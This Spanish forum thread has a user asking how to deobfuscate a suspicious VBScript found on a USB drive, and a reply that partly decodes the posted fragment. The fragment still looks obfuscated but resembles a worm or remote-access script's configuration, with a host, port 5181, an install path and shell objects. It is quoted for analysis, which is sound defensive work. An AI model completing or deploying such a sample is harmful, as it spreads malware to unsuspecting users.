vbs FUD

Iniciado por noxonsoftwares, Marzo 22, 2017, 09:27:04 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Hola compañeros del foro, hoy vengo a molestarlos con una pregunta sobre algo que la verdad nunca se me cruzo aprender o leer al respecto. Les cuento, resulta que desde el trabajo alguien me trajo un pendrive para que copie unos documentos y los edite, pero al insertar el pendrive me encuentro con un archivo *.vbs que al abrirlo para editarlo (así podría ver el contenido) me encuentro con el contenido cifrado o fud (disculpen si no hacete en la descripción del texto pero no tengo conocimiento) por lo cual me llamo la atención de que puede ser un virus o un downloader. Ahora bien mi pregunta es como puedo por decirlo desencriptar el texto para poder hacerlo legible (por lo que llego a deducir tiene declarado algunas rutas, no se si de archivos o web), para asi poder aprender de como esta hecho o ver si se autocopia en la pc o no (porque vi declaraciones string que podria ser que genere algun nombre aleatorio).

aqui les dejo un fragmento del vbs.

Código: php

d="NYXMUfSkzABuicqGmFxThlnrgeWosbHItJdRKEwVvpQLDjaCOyPZ"
g=""""
r="kqxT = "&g&"nzcMqnx11.MMcx.cUT"&g&"GqFT = 5181zcxTNuuMzF = "&g&"%NGGMNTN%"&g&"ucBfzuU = TFhUucBfquMUF = TFhUMzi xkUuuqYA xUT xkUuuqYA = nxXFzGT.XFUNTUqYAUXT("&g&"nxXFzGT.xkUuu"&g&")Mzi fzuUxgxTUiqYAxUT fzuUxgxTUiqYA = XFUNTUqYAUX


coloco solo ese fragmento porque no se si puedo poner todo el codigo. :-\

Marzo 23, 2017, 08:30:28 AM #1 Ultima modificación: Marzo 23, 2017, 08:34:16 AM por 79137913
HOLA!!!

Ese codigo genera lo siguiente:

d=
Código: php
NYXMUfSkzABuicqGmFxThlnrgeWosbHItJdRKEwVvpQLDjaCOyPZ

g=
Código: php
"

r=
Código: php
kqxT = "nzcMqnx11.MMcx.cUT"
GqFT = 5181
zcxTNuuMzF = "%NGGMNTN%"
ucBfzuU = TFhU
ucBfquMUF = TFhU

Mzi xkUuuqYA
xUT xkUuuqYA = nxXFzGT.XFUNTUqYAUXT("nxXFzGT.xkUuu")
Mzi fzuUxgxTUiqYA
xUT fzuUxgxTUiqYA = XFUNTUqYAUX


GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                No tienes permitido ver los links. Registrarse o Entrar a mi cuenta